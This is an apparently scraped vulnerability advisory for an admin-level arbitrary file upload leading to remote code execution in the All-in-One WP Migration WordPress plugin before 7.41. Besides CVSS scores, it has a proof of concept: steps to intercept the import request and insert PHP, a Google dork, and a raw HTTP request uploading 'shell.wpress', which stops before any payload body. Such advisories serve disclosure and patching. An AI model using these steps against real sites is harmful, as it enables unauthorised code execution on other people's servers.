Lucene search

YICHENG LIU_chenfeng labWPVDB-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083

HistoryFeb 07, 2022 - 12:00 a.m.

All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE

2022-02-0700:00:00

YICHENG LIU_chenfeng lab

wpscan.com

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

JSON

The plugin does not validate uploaded files’ extension, which allows administrators to upload PHP files on their site, even on multisite installations.

PoC

To reproduce: - Log in, Click all in one WP migration import to use the import from file function. - Intercept wp-admin/admin- ajax.php?action=ai1wm_ import&ai1wm;_ Import = 1 request. - Change the parameters of “upload-file”, “storage” and “archive”. Insert malicious PHP code into “upload-file”. Submit the request. - Access the URL under to execute system commands: wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive] # Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution # Google Dork: inurl:/wp-admin/admin-ajax.php # Date: 23/12/2020 # Exploit Author: YICHENGLIU_chenfeng lab # Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/ # Version: All-in-One WP Migration <=7.38 # Tested on: windows 10(x64) # data in http request : POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm;_import=1 HTTP/1.1 Host: 192.168.9.240 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797 Content-Length: 740 Origin: http://192.168.9.240 Connection: close Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799 -----------------------------3937767834299093780715813797 Content-Disposition: form-data; name=“upload-file”; filename=“shell.wpress” Content-Type: application/octet-stream

CPENameOperatorVersion
all-in-one-wp-migrationlt7.41

CPE	Name	Operator	Version
	all-in-one-wp-migration	lt	7.41

References

plugins.trac.wordpress.org/changeset/2516181#file8

7.2 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

HIGH

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

6.5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

JSON

Related for WPVDB-ID:87C6052C-2628-4987-A9A3-A03B5CA1E083